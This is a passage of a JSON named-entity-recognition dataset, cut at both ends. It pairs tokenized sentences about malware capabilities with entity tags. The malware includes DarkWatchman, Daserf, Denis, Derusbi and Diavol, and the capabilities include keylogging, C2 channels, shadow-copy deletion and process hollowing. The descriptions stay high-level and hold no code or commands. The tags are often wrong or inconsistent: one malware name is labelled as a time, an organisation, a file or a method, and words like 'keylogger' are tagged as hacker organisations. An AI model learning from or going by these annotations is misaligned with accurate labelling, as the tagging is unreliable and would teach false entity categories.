"tokens": [ - "DarkTortilla", - "can", - "use", - "WMI", - "queries", - "to", - "obtain", - "system", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkTortilla", - "has", - "established", - "persistence", - "via", - "the", - "`Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon`", - "registry", - "key." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "reports", - "window", - "names", - "along", - "with", - "keylogger", - "information", - "to", - "provide", - "application", - "context." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "use", - "TLS", - "to", - "encrypt", - "its", - "C2", - "channel." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "retrieve", - "browser", - "history." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "used", - "Base64", - "to", - "encode", - "PowerShell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "used", - "the", - "<code>csc.exe</code>", - "tool", - "to", - "compile", - "a", - "C#", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "collect", - "files", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "the", - "ability", - "to", - "self-extract", - "as", - "a", - "RAR", - "archive." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "used", - "a", - "DGA", - "to", - "generate", - "a", - "domain", - "name", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "been", - "delivered", - "as", - "compressed", - "RAR", - "payloads", - "in", - "ZIP", - "files", - "to", - "victims." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "been", - "observed", - "deleting", - "its", - "original", - "launcher", - "after", - "installation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "the", - "ability", - "to", - "enumerate", - "file", - "and", - "folder", - "names." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "store", - "configuration", - "strings,", - "keylogger,", - "and", - "output", - "of", - "components", - "in", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O", - "B-Way", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "uninstall", - "malicious", - "components", - "from", - "the", - "Registry,", - "stop", - "processes,", - "and", - "clear", - "the", - "browser", - "history." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "delete", - "shadow", - "volumes", - "using", - "<code>vssadmin.exe</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkWatchman", - "uses", - "JavaScript", - "to", - "perform", - "its", - "core", - "functionalities." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "track", - "key", - "presses", - "with", - "a", - "keylogger", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "stage", - "local", - "data", - "in", - "the", - "Windows", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "used", - "an", - "icon", - "mimicking", - "a", - "text", - "file", - "to", - "mask", - "a", - "malicious", - "executable." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "modify", - "Registry", - "values", - "to", - "store", - "configuration", - "strings,", - "keylogger,", - "and", - "output", - "of", - "components." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "list", - "signed", - "PnP", - "drivers", - "for", - "smartcard", - "readers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "execute", - "PowerShell", - "commands", - "and", - "has", - "used", - "PowerShell", - "to", - "execute", - "a", - "keylogger." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "query", - "the", - "Registry", - "to", - "determine", - "if", - "it", - "has", - "already", - "been", - "installed", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "created", - "a", - "scheduled", - "task", - "for", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "search", - "for", - "anti-virus", - "products", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "load", - "DLLs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "been", - "delivered", - "via", - "spearphishing", - "emails", - "that", - "contain", - "a", - "malicious", - "zip", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "DarkWatchman", - "encodes", - "data", - "using", - "hexadecimal", - "representation", - "before", - "sending", - "it", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "collect", - "the", - "OS", - "version,", - "system", - "architecture,", - "and", - "computer", - "name." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "identity", - "the", - "OS", - "locale", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "has", - "collected", - "the", - "username", - "from", - "a", - "victim", - "machine." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "collect", - "time", - "zone", - "information", - "and", - "system", - "`UPTIME`." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "DarkWatchman", - "uses", - "HTTPS", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "use", - "`cmd.exe`", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DarkWatchman", - "can", - "use", - "WMI", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "hides", - "collected", - "data", - "in", - "password-protected", - ".rar", - "archives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "hides", - "collected", - "data", - "in", - "password-protected", - ".rar", - "archives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Some", - "Daserf", - "samples", - "were", - "signed", - "with", - "a", - "stolen", - "digital", - "certificate." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Analysis", - "of", - "Daserf", - "has", - "shown", - "that", - "it", - "regularly", - "undergoes", - "technical", - "improvements", - "to", - "evade", - "anti-virus", - "detection." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "can", - "download", - "remote", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "can", - "log", - "keystrokes." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Daserf", - "leverages", - "Mimikatz", - "and", - "Windows", - "Credential", - "Editor", - "to", - "steal", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "I-Tool", - "B-SecTeam", - "B-Tool", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "uses", - "file", - "and", - "folder", - "names", - "related", - "to", - "legitimate", - "programs", - "in", - "order", - "to", - "blend", - "in,", - "such", - "as", - "HP,", - "Intel,", - "Adobe,", - "and", - "perflogs." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Tool", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Daserf", - "uses", - "encrypted", - "Windows", - "APIs", - "and", - "also", - "encrypts", - "data", - "using", - "the", - "alternative", - "base64+RC4", - "or", - "the", - "Caesar", - "cipher." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "can", - "take", - "screenshots." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "A", - "version", - "of", - "Daserf", - "uses", - "the", - "MPRESS", - "packer." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Daserf", - "uses", - "custom", - "base64", - "encoding", - "to", - "obfuscate", - "HTTP", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "can", - "use", - "steganography", - "to", - "hide", - "malicious", - "code", - "downloaded", - "to", - "the", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "uses", - "RC4", - "encryption", - "to", - "obfuscate", - "HTTP", - "traffic." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "uses", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Daserf", - "can", - "execute", - "shell", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DealersChoice", - "leverages", - "vulnerable", - "versions", - "of", - "Flash", - "to", - "perform", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DealersChoice", - "uses", - "HTTP", - "for", - "communication", - "with", - "the", - "C2", - "server." - ], - "ner_tags": [ - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "DealersChoice", - "makes", - "modifications", - "to", - "open-source", - "scripts", - "from", - "GitHub", - "and", - "executes", - "them", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "compressed", - "collected", - "data", - "using", - "zlib." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Denis", - "has", - "encoded", - "its", - "PowerShell", - "commands", - "in", - "Base64." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "exploits", - "a", - "security", - "vulnerability", - "to", - "load", - "a", - "fake", - "DLL", - "and", - "execute", - "its", - "code." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "has", - "used", - "DNS", - "tunneling", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "will", - "decrypt", - "important", - "strings", - "used", - "for", - "C&C", - "communication." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "has", - "a", - "command", - "to", - "delete", - "files", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "has", - "several", - "commands", - "to", - "search", - "directories", - "for", - "files." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "replaces", - "the", - "nonexistent", - "Windows", - "DLL", - "\"msfte.dll\"", - "with", - "its", - "own", - "malicious", - "version,", - "which", - "is", - "loaded", - "by", - "the", - "SearchIndexer.exe", - "and", - "SearchProtocolHost.exe." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Denis", - "deploys", - "additional", - "backdoors", - "and", - "hacking", - "tools", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "used", - "the", - "<code>IsDebuggerPresent</code>,", - "<code>OutputDebugString</code>,", - "and", - "<code>SetLastError</code>", - "APIs", - "to", - "avoid", - "debugging.", - "Denis", - "used", - "<code>GetProcAddress</code>", - "and", - "<code>LoadLibrary</code>", - "to", - "dynamically", - "resolve", - "APIs.", - "Denis", - "also", - "used", - "the", - "<code>Wow64SetThreadContext</code>", - "API", - "as", - "part", - "of", - "a", - "process", - "hollowing", - "process." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "obfuscates", - "its", - "code", - "and", - "encrypts", - "the", - "API", - "names." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "has", - "a", - "version", - "written", - "in", - "PowerShell." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "performed", - "process", - "hollowing", - "through", - "the", - "API", - "calls", - "CreateRemoteThread,", - "ResumeThread,", - "and", - "Wow64SetThreadContext." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Denis", - "queries", - "the", - "Registry", - "for", - "keys", - "and", - "values." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "encodes", - "the", - "data", - "sent", - "to", - "the", - "server", - "in", - "Base64." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "ran", - "multiple", - "system", - "checks,", - "looking", - "for", - "processor", - "and", - "register", - "characteristics,", - "to", - "evade", - "emulation", - "and", - "analysis." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "collects", - "OS", - "information", - "and", - "the", - "computer", - "name", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "uses", - "<code>ipconfig</code>", - "to", - "gather", - "the", - "IP", - "address", - "from", - "the", - "system." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "enumerates", - "and", - "collects", - "the", - "username", - "from", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Denis", - "can", - "launch", - "a", - "remote", - "shell", - "to", - "execute", - "arbitrary", - "commands", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "performing", - "audio", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "injects", - "itself", - "into", - "the", - "secure", - "shell", - "(SSH)", - "process." - ], - "ner_tags": [ - "B-Way", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "uses", - "a", - "backup", - "communication", - "method", - "with", - "an", - "HTTP", - "beacon." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "deleting", - "files.", - "It", - "has", - "been", - "observed", - "loading", - "a", - "Linux", - "Kernel", - "Module", - "(LKM)", - "and", - "then", - "deleting", - "it", - "from", - "the", - "hard", - "disk", - "as", - "well", - "as", - "overwriting", - "the", - "data", - "with", - "null", - "bytes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "obtaining", - "directory,", - "file,", - "and", - "drive", - "listings." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "logging", - "keystrokes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Derusbi", - "binds", - "to", - "a", - "raw", - "socket", - "on", - "a", - "random", - "source", - "port", - "between", - "31800", - "and", - "31900", - "for", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "has", - "used", - "unencrypted", - "HTTP", - "on", - "port", - "443", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "collects", - "current", - "and", - "parent", - "process", - "IDs." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "enumerating", - "Registry", - "keys", - "and", - "values." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "variants", - "have", - "been", - "seen", - "that", - "use", - "Registry", - "persistence", - "to", - "proxy", - "execution", - "through", - "regsvr32.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "performing", - "screen", - "captures." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "obfuscates", - "C2", - "traffic", - "with", - "variable", - "4-byte", - "XOR", - "keys." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "gathers", - "the", - "name", - "of", - "the", - "local", - "host,", - "version", - "of", - "GNU", - "Compiler", - "Collection", - "(GCC),", - "and", - "the", - "system", - "information", - "about", - "the", - "CPU,", - "machine,", - "and", - "operating", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Linux", - "version", - "of", - "Derusbi", - "checks", - "if", - "the", - "victim", - "user", - "ID", - "is", - "anything", - "other", - "than", - "zero", - "(normally", - "used", - "for", - "root),", - "and", - "the", - "malware", - "will", - "not", - "execute", - "if", - "it", - "does", - "not", - "have", - "root", - "privileges.", - "Derusbi", - "also", - "gathers", - "the", - "username", - "of", - "the", - "victim." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "Derusbi", - "malware", - "supports", - "timestomping." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-Tool", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "creating", - "a", - "remote", - "Bash", - "shell", - "and", - "executing", - "commands." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Derusbi", - "is", - "capable", - "of", - "capturing", - "video." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "delete", - "specified", - "files", - "from", - "a", - "targeted", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "encrypted", - "files", - "using", - "an", - "RSA", - "key", - "though", - "the", - "`CryptEncrypt`", - "API", - "and", - "has", - "appended", - "filenames", - "with", - "\".lock64\"." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "attempt", - "to", - "stop", - "security", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "a", - "command", - "to", - "traverse", - "the", - "files", - "and", - "directories", - "in", - "a", - "given", - "path." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "receive", - "configuration", - "updates", - "and", - "additional", - "payloads", - "including", - "wscpy.exe", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "can", - "delete", - "shadow", - "copies", - "using", - "the", - "`IVssBackupComponents`", - "COM", - "object", - "to", - "call", - "the", - "`DeleteSnapshots`", - "method." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "After", - "encryption,", - "Diavol", - "will", - "capture", - "the", - "desktop", - "background", - "window,", - "set", - "the", - "background", - "color", - "to", - "black,", - "and", - "change", - "the", - "desktop", - "wallpaper", - "to", - "a", - "newly", - "created", - "bitmap", - "image", - "with", - "the", - "text", - "“All", - "your", - "files", - "are", - "encrypted!", - "For", - "more", - "information", - "see", - "“README-FOR-DECRYPT.txt\"." - ], - "ner_tags": [ - "O", - "O", - "B-Time", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "used", - "several", - "API", - "calls", - "like", - "`GetLogicalDriveStrings`,", - "`SleepEx`,", - "`SystemParametersInfoAPI`,", - "`CryptEncrypt`,", - "and", - "others", - "to", - "execute", - "parts", - "of", - "its", - "attack." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "a", - "`ENMDSKS`", - "command", - "to", - "enumerates", - "available", - "network", - "shares." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "Base64", - "encoded", - "the", - "RSA", - "public", - "key", - "used", - "for", - "encrypting", - "files." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Diavol", - "has", - "used", - "`CreateToolhelp32Snapshot`,", - "`Process32First`,", - "and", - "`Process32Next`", - "API", - "calls", - "to", - "enumerate", - "the", - "running", - "processes", - "in", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", 